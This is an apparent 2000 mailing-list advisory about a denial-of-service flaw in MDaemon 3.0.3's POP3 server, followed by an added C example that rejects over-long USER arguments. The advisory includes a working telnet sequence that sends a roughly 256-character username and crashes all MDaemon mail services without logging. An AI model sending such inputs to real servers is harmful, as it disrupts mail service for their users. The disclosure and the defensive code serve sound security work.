Subject: Deerfield Communications MDaemon Mail Server DoS
From: cassiusHUSHMAIL.COM
Date: Wed May 24 2000 - 13:26:29 CDT


Deerfield Communications (the Wingate perpetrators) MDaemon POP server is
vulnerable to bigass usernames causing a DoS. MDaemon is a mail server
package for 95, 98, NT and Win2k. Many systems that run Deerfield's World
Client web-mail also use MDaemon.

Exploit tested on Win2kpro running MDaemon 3.0.3

telnet example.com 110
+OK example.com POP service ready [1] using MDaemon v3.0.3 R
user ................(x256 more or less but 256 does the trick)
pass b00m!

This kills MDaemon and all of its servers (POP3, IMAP, SMTP)
Nothing is logged. Event viewer says the service has terminated unexpectedly.
With proper research an overflow attack might be possible but I couldn't
find any access violations.
Vendor has been copied on this message. Not much else to say.

-Cassius
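
Added example, not part of the original post and not MDaemon code: a server-side check that rejects an over-long USER argument before it is copied anywhere. The function name pop3_parse_user and the status codes are hypothetical; the limits are the 40-character argument limit from RFC 1939 and the 255-octet command line limit from RFC 2449, not values taken from the advisory.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define POP3_MAX_LINE 255 /* RFC 2449: command line limit, CRLF included */
#define POP3_MAX_ARG   40 /* RFC 1939: limit for one argument */

enum pop3_status { POP3_OK, POP3_ERR_SYNTAX, POP3_ERR_TOO_LONG };

/* Validate one received line (len bytes, not NUL-terminated) as
 * "USER <name>CRLF". The name is copied to out only after every
 * length check has passed, so an oversized name never reaches a buffer. */
enum pop3_status pop3_parse_user(const char *line, size_t len,
                                 char *out, size_t out_sz)
{
    static const char verb[] = "USER ";
    const size_t vlen = sizeof verb - 1;
    size_t i, arg_len;

    if (out_sz == 0) return POP3_ERR_SYNTAX;
    out[0] = '\0';
    if (len > POP3_MAX_LINE) return POP3_ERR_TOO_LONG;
    if (len < vlen + 3) return POP3_ERR_SYNTAX; /* verb, 1 char, CRLF */
    if (line[len - 2] != '\r' || line[len - 1] != '\n') return POP3_ERR_SYNTAX;
    for (i = 0; i < vlen; i++)
        if (toupper((unsigned char)line[i]) != verb[i]) return POP3_ERR_SYNTAX;

    arg_len = len - vlen - 2;
    if (arg_len > POP3_MAX_ARG || arg_len >= out_sz) return POP3_ERR_TOO_LONG;
    for (i = 0; i < arg_len; i++) {
        unsigned char c = (unsigned char)line[vlen + i];
        if (c <= 0x20 || c >= 0x7f) return POP3_ERR_SYNTAX; /* printable, no space */
    }
    memcpy(out, line + vlen, arg_len);
    out[arg_len] = '\0';
    return POP3_OK;
}

int main(void)
{
    char name[POP3_MAX_ARG + 1], big[5 + 256 + 2]; /* constructed inputs */
    memcpy(big, "USER ", 5);
    memset(big + 5, '.', 256);
    memcpy(big + 261, "\r\n", 2);
    printf("normal: %d\n", pop3_parse_user("USER alice\r\n", 12, name, sizeof name));
    printf("256-char name: %d\n", pop3_parse_user(big, sizeof big, name, sizeof name));
    return 0;
}
```

A server using a check like this would answer -ERR and log the rejected length, which also gives operators the log entry the post notes is missing.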
